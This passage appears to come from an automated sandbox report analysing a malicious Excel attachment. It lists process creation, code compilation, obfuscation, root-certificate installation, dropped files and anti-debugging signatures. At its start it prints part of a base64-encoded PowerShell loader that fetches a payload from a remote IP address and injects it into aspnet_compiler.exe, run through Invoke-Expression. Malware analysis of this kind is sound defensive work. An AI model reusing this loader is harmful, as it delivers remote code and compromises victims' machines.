m5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose Jump to behavior
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899A022D push eax; iretd 8_2_000007FE899A0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899A00BD pushad ; iretd 8_2_000007FE899A00C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00407041 push cs; iretd 16_2_00407042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0041705E push edi; iretd 16_2_00417060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_004030F0 push eax; ret 16_2_004030F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0041C8FC push cs; iretd 16_2_0041C8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401949 push 63DCA26Ah; ret 16_2_0040194E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0040214B push edx; retf 16_2_0040214E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00402101 push ebp; iretd 16_2_0040210D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0040210E push eax; retf 16_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_004021A4 push eax; retf 16_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0041125B pushfd ; ret 16_2_0041125E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_004242D9 push esp; ret 16_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_004242E3 push esp; ret 16_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401AB8 push edx; retf 16_2_00401AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00413416 push ecx; iretd 16_2_00413417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_0041ECDC push ds; iretd 16_2_0041ECDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401DF5 push ebp; iretd 16_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401DA6 push ebp; iretd 16_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00416EAA push esp; retf 16_2_00416EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401F0D push eax; retf 16_2_00401F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401FEB push edx; retf 16_2_00401FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00410FEE push ebp; iretd 16_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00410FF3 push ebp; iretd 16_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401FA4 push edx; ret 16_2_00401FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00401FBA push 0000006Ah; iretd 16_2_00401FC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00A9DFA1 push ecx; ret 16_2_00A9DFB4

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: PI-02911202409#.xla.xlsx Stream path 'MBD006EC260/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: PI-02911202409#.xla.xlsx Stream path 'Workbook' entropy: 7.9983984088 (max. 8.0)
Source: 50A30000.0.dr Stream path 'MBD006EC260/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 50A30000.0.dr Stream path 'Workbook' entropy: 7.99853880878 (max. 8.0)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 16_2_00AE0101 rdtsc 16_2_00AE0101
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
